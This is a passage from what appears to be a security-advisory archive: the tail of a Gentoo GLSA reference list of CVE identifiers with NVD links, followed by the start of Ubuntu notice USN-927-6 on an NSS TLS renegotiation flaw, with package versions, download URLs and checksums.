http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4508\n[ 267 ] CVE-2010-5074\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5074\n[ 268 ] CVE-2011-0051\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0051\n[ 269 ] CVE-2011-0053\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0053\n[ 270 ] CVE-2011-0054\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0054\n[ 271 ] CVE-2011-0055\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0055\n[ 272 ] CVE-2011-0056\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0056\n[ 273 ] CVE-2011-0057\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0057\n[ 274 ] CVE-2011-0058\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0058\n[ 275 ] CVE-2011-0059\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0059\n[ 276 ] CVE-2011-0061\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0061\n[ 277 ] CVE-2011-0062\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0062\n[ 278 ] CVE-2011-0065\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0065\n[ 279 ] CVE-2011-0066\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0066\n[ 280 ] CVE-2011-0067\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0067\n[ 281 ] CVE-2011-0068\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0068\n[ 282 ] CVE-2011-0069\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0069\n[ 283 ] CVE-2011-0070\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0070\n[ 284 ] CVE-2011-0071\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0071\n[ 285 ] CVE-2011-0072\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0072\n[ 286 ] CVE-2011-0073\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0073\n[ 287 ] CVE-2011-0074\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0074\n[ 288 ] CVE-2011-0075\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0075\n[ 289 ] CVE-2011-0076\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0076\n[ 290 ] CVE-2011-0077\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0077\n[ 291 ] CVE-2011-0078\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0078\n[ 292 ] CVE-2011-0079\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0079\n[ 293 ] CVE-2011-0080\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0080\n[ 294 ] CVE-2011-0081\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0081\n[ 295 ] CVE-2011-0082\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0082\n[ 296 ] CVE-2011-0083\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0083\n[ 297 ] CVE-2011-0084\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0084\n[ 298 ] CVE-2011-0085\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0085\n[ 299 ] CVE-2011-1187\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1187\n[ 300 ] CVE-2011-1202\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1202\n[ 301 ] CVE-2011-1712\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1712\n[ 302 ] CVE-2011-2362\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2362\n[ 303 ] CVE-2011-2363\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2363\n[ 304 ] CVE-2011-2364\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2364\n[ 305 ] CVE-2011-2365\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2365\n[ 306 ] CVE-2011-2369\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2369\n[ 307 ] CVE-2011-2370\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2370\n[ 308 ] CVE-2011-2371\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2371\n[ 309 ] CVE-2011-2372\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2372\n[ 310 ] CVE-2011-2373\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2373\n[ 311 ] CVE-2011-2374\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2374\n[ 312 ] CVE-2011-2375\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2375\n[ 313 ] CVE-2011-2376\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2376\n[ 314 ] CVE-2011-2377\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2377\n[ 315 ] CVE-2011-2378\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2378\n[ 316 ] CVE-2011-2605\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2605\n[ 317 ] CVE-2011-2980\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2980\n[ 318 ] CVE-2011-2981\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2981\n[ 319 ] CVE-2011-2982\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2982\n[ 320 ] CVE-2011-2983\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2983\n[ 321 ] CVE-2011-2984\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2984\n[ 322 ] CVE-2011-2985\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2985\n[ 323 ] CVE-2011-2986\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2986\n[ 324 ] CVE-2011-2987\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2987\n[ 325 ] CVE-2011-2988\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2988\n[ 326 ] CVE-2011-2989\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2989\n[ 327 ] CVE-2011-2990\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2990\n[ 328 ] CVE-2011-2991\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2991\n[ 329 ] CVE-2011-2993\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2993\n[ 330 ] CVE-2011-2995\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2995\n[ 331 ] CVE-2011-2996\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2996\n[ 332 ] CVE-2011-2997\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2997\n[ 333 ] CVE-2011-2998\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2998\n[ 334 ] CVE-2011-2999\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2999\n[ 335 ] CVE-2011-3000\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3000\n[ 336 ] CVE-2011-3001\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3001\n[ 337 ] CVE-2011-3002\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3002\n[ 338 ] CVE-2011-3003\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3003\n[ 339 ] CVE-2011-3004\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3004\n[ 340 ] CVE-2011-3005\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3005\n[ 341 ] CVE-2011-3026\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3026\n[ 342 ] CVE-2011-3062\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3062\n[ 343 ] CVE-2011-3232\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3232\n[ 344 ] CVE-2011-3389\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389\n[ 345 ] CVE-2011-3640\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3640\n[ 346 ] CVE-2011-3647\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3647\n[ 347 ] CVE-2011-3648\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3648\n[ 348 ] CVE-2011-3649\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3649\n[ 349 ] CVE-2011-3650\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3650\n[ 350 ] CVE-2011-3651\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3651\n[ 351 ] CVE-2011-3652\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3652\n[ 352 ] CVE-2011-3653\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3653\n[ 353 ] CVE-2011-3654\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3654\n[ 354 ] CVE-2011-3655\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3655\n[ 355 ] CVE-2011-3658\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3658\n[ 356 ] CVE-2011-3659\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3659\n[ 357 ] CVE-2011-3660\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3660\n[ 358 ] CVE-2011-3661\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3661\n[ 359 ] CVE-2011-3663\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3663\n[ 360 ] CVE-2011-3665\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3665\n[ 361 ] CVE-2011-3670\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3670\n[ 362 ] CVE-2011-3866\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3866\n[ 363 ] CVE-2011-4688\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4688\n[ 364 ] CVE-2012-0441\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0441\n[ 365 ] CVE-2012-0442\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0442\n[ 366 ] CVE-2012-0443\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0443\n[ 367 ] CVE-2012-0444\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0444\n[ 368 ] CVE-2012-0445\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0445\n[ 369 ] CVE-2012-0446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0446\n[ 370 ] CVE-2012-0447\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0447\n[ 371 ] CVE-2012-0449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0449\n[ 372 ] CVE-2012-0450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0450\n[ 373 ] CVE-2012-0451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0451\n[ 374 ] CVE-2012-0452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0452\n[ 375 ] CVE-2012-0455\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0455\n[ 376 ] CVE-2012-0456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0456\n[ 377 ] CVE-2012-0457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0457\n[ 378 ] CVE-2012-0458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0458\n[ 379 ] CVE-2012-0459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0459\n[ 380 ] CVE-2012-0460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0460\n[ 381 ] CVE-2012-0461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0461\n[ 382 ] CVE-2012-0462\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0462\n[ 383 ] CVE-2012-0463\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0463\n[ 384 ] CVE-2012-0464\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0464\n[ 385 ] CVE-2012-0467\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0467\n[ 386 ] CVE-2012-0468\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0468\n[ 387 ] CVE-2012-0469\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0469\n[ 388 ] CVE-2012-0470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0470\n[ 389 ] CVE-2012-0471\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0471\n[ 390 ] CVE-2012-0473\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0473\n[ 391 ] CVE-2012-0474\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0474\n[ 392 ] CVE-2012-0475\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0475\n[ 393 ] CVE-2012-0477\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0477\n[ 394 ] CVE-2012-0478\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0478\n[ 395 ] CVE-2012-0479\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0479\n[ 396 ] CVE-2012-1937\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1937\n[ 397 ] CVE-2012-1938\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1938\n[ 398 ] CVE-2012-1939\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1939\n[ 399 ] CVE-2012-1940\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1940\n[ 400 ] CVE-2012-1941\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1941\n[ 401 ] CVE-2012-1945\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1945\n[ 402 ] CVE-2012-1946\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1946\n[ 403 ] CVE-2012-1947\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1947\n[ 404 ] CVE-2012-1948\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1948\n[ 405 ] CVE-2012-1949\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1949\n[ 406 ] CVE-2012-1950\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1950\n[ 407 ] CVE-2012-1951\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1951\n[ 408 ] CVE-2012-1952\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1952\n[ 409 ] CVE-2012-1953\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1953\n[ 410 ] CVE-2012-1954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1954\n[ 411 ] CVE-2012-1955\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1955\n[ 412 ] CVE-2012-1956\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1956\n[ 413 ] CVE-2012-1957\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1957\n[ 414 ] CVE-2012-1958\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1958\n[ 415 ] CVE-2012-1959\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1959\n[ 416 ] CVE-2012-1960\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1960\n[ 417 ] CVE-2012-1961\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1961\n[ 418 ] CVE-2012-1962\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1962\n[ 419 ] CVE-2012-1963\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1963\n[ 420 ] CVE-2012-1964\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1964\n[ 421 ] CVE-2012-1965\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1965\n[ 422 ] CVE-2012-1966\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1966\n[ 423 ] CVE-2012-1967\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1967\n[ 424 ] CVE-2012-1970\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1970\n[ 425 ] CVE-2012-1971\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1971\n[ 426 ] CVE-2012-1972\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1972\n[ 427 ] CVE-2012-1973\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1973\n[ 428 ] CVE-2012-1974\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1974\n[ 429 ] CVE-2012-1975\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1975\n[ 430 ] CVE-2012-1976\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1976\n[ 431 ] CVE-2012-1994\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1994\n[ 432 ] CVE-2012-3956\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3956\n[ 433 ] CVE-2012-3957\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3957\n[ 434 ] CVE-2012-3958\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3958\n[ 435 ] CVE-2012-3959\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3959\n[ 436 ] CVE-2012-3960\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3960\n[ 437 ] CVE-2012-3961\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3961\n[ 438 ] CVE-2012-3962\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3962\n[ 439 ] CVE-2012-3963\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3963\n[ 440 ] CVE-2012-3964\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3964\n[ 441 ] CVE-2012-3965\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3965\n[ 442 ] CVE-2012-3966\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3966\n[ 443 ] CVE-2012-3967\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3967\n[ 444 ] CVE-2012-3968\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3968\n[ 445 ] CVE-2012-3969\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3969\n[ 446 ] CVE-2012-3970\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3970\n[ 447 ] CVE-2012-3971\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3971\n[ 448 ] CVE-2012-3972\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3972\n[ 449 ] CVE-2012-3973\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3973\n[ 450 ] CVE-2012-3975\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3975\n[ 451 ] CVE-2012-3976\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3976\n[ 452 ] CVE-2012-3977\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3977\n[ 453 ] CVE-2012-3978\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3978\n[ 454 ] CVE-2012-3980\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3980\n[ 455 ] CVE-2012-3982\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3982\n[ 456 ] CVE-2012-3984\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3984\n[ 457 ] CVE-2012-3985\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3985\n[ 458 ] CVE-2012-3986\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3986\n[ 459 ] CVE-2012-3988\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3988\n[ 460 ] CVE-2012-3989\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3989\n[ 461 ] CVE-2012-3990\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3990\n[ 462 ] CVE-2012-3991\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3991\n[ 463 ] CVE-2012-3992\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3992\n[ 464 ] CVE-2012-3993\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3993\n[ 465 ] CVE-2012-3994\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3994\n[ 466 ] CVE-2012-3995\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3995\n[ 467 ] CVE-2012-4179\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4179\n[ 468 ] CVE-2012-4180\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4180\n[ 469 ] CVE-2012-4181\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4181\n[ 470 ] CVE-2012-4182\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4182\n[ 471 ] CVE-2012-4183\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4183\n[ 472 ] CVE-2012-4184\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4184\n[ 473 ] CVE-2012-4185\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4185\n[ 474 ] CVE-2012-4186\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4186\n[ 475 ] CVE-2012-4187\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4187\n[ 476 ] CVE-2012-4188\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4188\n[ 477 ] CVE-2012-4190\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4190\n[ 478 ] CVE-2012-4191\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4191\n[ 479 ] CVE-2012-4192\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4192\n[ 480 ] CVE-2012-4193\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4193\n[ 481 ] CVE-2012-4194\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4194\n[ 482 ] CVE-2012-4195\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4195\n[ 483 ] CVE-2012-4196\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4196\n[ 484 ] CVE-2012-4201\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4201\n[ 485 ] CVE-2012-4202\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4202\n[ 486 ] CVE-2012-4204\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4204\n[ 487 ] CVE-2012-4205\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4205\n[ 488 ] CVE-2012-4206\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4206\n[ 489 ] CVE-2012-4207\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4207\n[ 490 ] CVE-2012-4208\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4208\n[ 491 ] CVE-2012-4209\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4209\n[ 492 ] CVE-2012-4210\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4210\n[ 493 ] CVE-2012-4212\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4212\n[ 494 ] CVE-2012-4215\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4215\n[ 495 ] CVE-2012-4216\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4216\n[ 496 ] CVE-2012-5354\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5354\n[ 497 ] CVE-2012-5829\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5829\n[ 498 ] CVE-2012-5830\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5830\n[ 499 ] CVE-2012-5833\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5833\n[ 500 ] CVE-2012-5835\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5835\n[ 501 ] CVE-2012-5836\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5836\n[ 502 ] CVE-2012-5838\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5838\n[ 503 ] CVE-2012-5839\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5839\n[ 504 ] CVE-2012-5840\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5840\n[ 505 ] CVE-2012-5841\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5841\n[ 506 ] CVE-2012-5842\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5842\n[ 507 ] CVE-2012-5843\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5843\n[ 508 ] Firefox Blocking Fraudulent Certificates\n\nhttp://blog.mozilla.org/security/2011/03/22/firefox-blocking-fraudulent-c=\nertificates/\n[ 509 ] Mozilla Foundation Security Advisory 2011-11\n http://www.mozilla.org/security/announce/2011/mfsa2011-11.html\n[ 510 ] Mozilla Foundation Security Advisory 2011-34\n http://www.mozilla.org/security/announce/2011/mfsa2011-34.html\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201301-01.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2013 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. ===========================================================\nUbuntu Security Notice USN-927-6 July 23, 2010\nnss vulnerability\nCVE-2009-3555\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 9.04\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 9.04:\n libnss3-1d 3.12.6-0ubuntu0.9.04.1\n\nAfter a standard system upgrade you need to restart your session to effect\nthe necessary changes. \n\nDetails follow:\n\nUSN-927-1 fixed vulnerabilities in NSS on Ubuntu 9.10. This update provides the\ncorresponding updates for Ubuntu 9.04. \n\nOriginal advisory details:\n\n Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3\n protocols. If an attacker could perform a man in the middle attack at the\n start of a TLS connection, the attacker could inject arbitrary content at\n the beginning of the user\u0027s session. This update adds support for the new\n new renegotiation extension and will use it when the server supports it. \n\n\nUpdated packages for Ubuntu 9.04:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.04.1.diff.gz\n Size/MD5: 36776 09e94267337a3318b4955b7a830f5244\n http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.04.1.dsc\n Size/MD5: 1651 a682fa17ab7385f06eae108e3b8eeb76\n http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6.orig.tar.gz\n Size/MD5: 5947630 da42596665f226de5eb3ecfc1ec57cd1\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.04.1_amd64.deb\n Size/MD5: 3355322 1901b0a2e9022baccca540cb776da507\n http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.04.1_amd64.deb\n Size/MD5: 1230706 a5be600c34d6c62f3c7c7d9fe8fe6807\n http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.04.1_amd64.deb\n Size/MD5: 263110 37bf5e46dc372000a1932336ded61143\n http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.04.1_amd64.deb\n Size/MD5: 17788 cb888df2baa2d06cf98091f1bd033496\n http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.04.1_amd64.deb\n Size/MD5: 318718 77e6de51c2beebe6a2570e1f70069d91\n\n i386 architecture (x86 compatible Intel/AMD):\n\n http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.04.1_i386.deb\n Size/MD5: 3181812 ab6888c9709c1101e0f07bda925ea76b\n http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.04.1_i386.deb\n Size/MD5: 1112446 64e165966e297b247e220aa017851248\n http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.04.1_i386.deb\n Size/MD5: 260434 6dc65e066be54da5a4ad7e784c37fa49\n 